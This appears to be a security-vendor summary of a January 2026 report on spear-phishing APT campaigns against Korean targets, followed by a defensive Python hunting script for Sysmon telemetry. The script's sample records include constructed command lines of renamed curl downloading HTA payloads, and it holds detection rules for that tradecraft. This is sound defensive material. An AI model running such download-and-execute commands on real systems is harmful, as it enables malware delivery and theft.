January 2026 APT Attack Trends Report (Domestic)

2026-02-19 AhnLab January 2026 APT Attack Trends Report (Domestic)

https://asec.ahnlab.com/ko/92647/


AhnLab's January 2026 domestic APT trends report says spear phishing dominated observed attacks against Korean targets, with LNK files representing the largest share of activity. One LNK chain runs PowerShell to reach external URLs, copies curl.exe under alternate names, downloads a legitimate AutoIt program and malicious AutoIt script, and registers scheduled tasks for persistence. Another LNK chain uses Windows curl.exe to download and execute HTA files from GitHub repositories or Google Drive, then drops downloaders that load an infostealer, keylogger, and backdoor in memory. The reported capabilities include command execution, directory listing, file upload, file download, system information theft, keylogging, and collection of virtual-asset-related information, making the activity relevant for Korean defenders monitoring malicious attachments and post-compromise tooling.
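The curl.exe and AutoIt behaviours summarised above can be hunted in process-creation telemetry. The following is an added example, not taken from AhnLab's report: it assumes Sysmon Event ID 1 field names (`Image`, `OriginalFileName`, `CommandLine`), and the rule names, the hosting-domain list and the sample records are constructed for illustration.

```python
import ntpath
import re

# Assumption: hosts standing in for "GitHub repositories or Google Drive".
HOSTING = {"github.com", "raw.githubusercontent.com", "drive.google.com"}
URL_HOST = re.compile(r"https?://([^/\s\"':]+)", re.I)
HTA_REF = re.compile(r"\.hta(?![A-Za-z0-9])", re.I)

def classify(event):
    """Return the hunting rules matched by one process-creation record."""
    image = ntpath.basename(event.get("Image", "")).lower()
    original = event.get("OriginalFileName", "").lower()
    cmdline = event.get("CommandLine", "")
    hits = []
    # A copy of curl.exe under another name keeps curl.exe in its version info.
    if original == "curl.exe" and image != "curl.exe":
        hits.append("renamed_curl")
    if original == "curl.exe" or image == "curl.exe":
        if HTA_REF.search(cmdline):
            hits.append("curl_hta_download")
        if any(h.lower() in HOSTING for h in URL_HOST.findall(cmdline)):
            hits.append("curl_file_hosting")
    # AutoIt interpreter, whatever it is named on disk; legitimate use exists,
    # so treat this as a lead to correlate with the curl hits on the same host.
    if original == "autoit3.exe":
        hits.append("autoit_interpreter")
    return hits

# Constructed sample records (Sysmon Event ID 1 field names); not from the report.
SAMPLE = [
    {"Image": r"C:\Users\Public\wupd.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"wupd.exe -s -o C:\Users\Public\a.dat https://files.example.test/a"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r'curl.exe -L -o "C:\Users\u\AppData\Local\Temp\d.hta" '
                    r"https://raw.githubusercontent.com/example/example/main/d.hta"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe https://example.com/health"},
    {"Image": r"C:\ProgramData\svc.exe", "OriginalFileName": "AutoIt3.exe",
     "CommandLine": r"svc.exe C:\ProgramData\cfg.bin"},
]

def run(events=SAMPLE):
    return [classify(e) for e in events]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE, run()):
        print(event["Image"], hits)
```

Scheduled-task registration and the in-memory payloads are not covered here; those need task-creation and memory or module-load telemetry respectively.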
